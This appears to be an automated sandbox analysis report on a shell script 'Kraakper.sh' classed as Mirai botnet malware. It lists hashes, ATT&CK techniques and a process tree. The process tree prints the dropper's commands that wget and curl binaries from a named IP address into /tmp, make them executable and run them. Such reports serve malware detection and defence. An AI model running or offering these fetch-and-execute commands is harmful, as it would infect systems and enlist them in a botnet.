Analysis
-
max time kernel
150s -
max time network
146s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
16-02-2025 15:52
Static task
static1
Behavioral task
behavioral1
Sample
Kraakper.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
Kraakper.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
Kraakper.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
Kraakper.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
Kraakper.sh
-
Size
2KB
-
MD5
217da6263dc653b10eb0c61fc6b668c1
-
SHA1
330c8839096b3d5d6f66f5731f66602d76c96d45
-
SHA256
d888874124e3ec7f4dc0f980c78c89b4b9a1aac62309b3eb4aee15974fa29b47
-
SHA512
e00cfeeccb54221eae3ab0ce5bccc461cbd89001771e127354f8aafedda5cac4a0856b1523a5a03b2b8790c1cbc64e04d5977e6da4c3220f58567cd4be4c628e
Malware Config
Extracted
mirai
KURC
Extracted
mirai
KURC
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 739 chmod 802 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/Kraakper 740 Kraakper.sh /tmp/Kraakper 804 Kraakper.sh -
description ioc Process File opened for reading /proc/filesystems cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 742 wget 791 curl 801 cat -
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/kre4per.mips curl File opened for modification /tmp/kre4per.mpsl wget File opened for modification /tmp/busybox cp File opened for modification /tmp/kre4per.x86 wget File opened for modification /tmp/kre4per.x86 curl File opened for modification /tmp/Kraakper Kraakper.sh File opened for modification /tmp/kre4per.mips wget
Processes
-
/tmp/Kraakper.sh/tmp/Kraakper.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:707 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:713
-
-
/usr/bin/wgetwget http://144.172.73.45/bins/kre4per.x862⤵
- Writes file to tmp directory
PID:719
-
-
/usr/bin/curlcurl -O http://144.172.73.45/bins/kre4per.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/catcat kre4per.x862⤵PID:738
-
-
/bin/chmodchmod +x busybox Kraakper Kraakper.sh kre4per.x86 systemd-private-97701d714b2b4aa2a3d1bae76dc08dc7-systemd-timedated.service-2h4YP62⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/Kraakper./Kraakper2⤵PID:740
-
-
/usr/bin/wgetwget http://144.172.73.45/bins/kre4per.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/usr/bin/curlcurl -O http://144.172.73.45/bins/kre4per.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/catcat kre4per.mips2⤵
- System Network Configuration Discovery
PID:801
-
-
/bin/chmodchmod +x busybox Kraakper Kraakper.sh kre4per.mips kre4per.x862⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/Kraakper./Kraakper2⤵PID:804
-
-
/usr/bin/wgetwget http://144.172.73.45/bins/kre4per.mpsl2⤵
- Writes file to tmp directory
PID:807
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
78KB
MD5f42d3373e5fd409efd1d1ec30e1f14d2
SHA1696f396f500bac9d6e8f37ae0c0012ebc41935ad
SHA25698519df50f45e1740e083964afa2bdefe8847abe549a12cd3901d605679c0f24
SHA512a19f201e97044749714e0e5b47b752a5d6eb30c5610a7016fe5bd861264a14793970cc23c0d6bd00ed043bd4d1663e27197ff47d214ee515e925cd56d081f2c6
-
Filesize
857KB
MD56ffc46165b5d9726a6607f3ea5305589
SHA1ab127220f42e816b413dde0d17031e251a7bc98f
SHA25680d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c
SHA512456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8
-
Filesize
53KB
MD5f46d2aaea328699a338a9fa27054bb83
SHA124d7151b15c8bdbe838fc1824c5a7be42a764a13
SHA2562bf70c104f6005f82de17b13efa905c445e9dd0de5b973726d4d76c707207a5b
SHA512f7ad7da51775d8b8e9569304f2d079c48c053d5cf2625aa0ba9592f33616c379471ba3506fa43198106b0a817580b2b128a1389f52ccae1ce49de6e0844903c2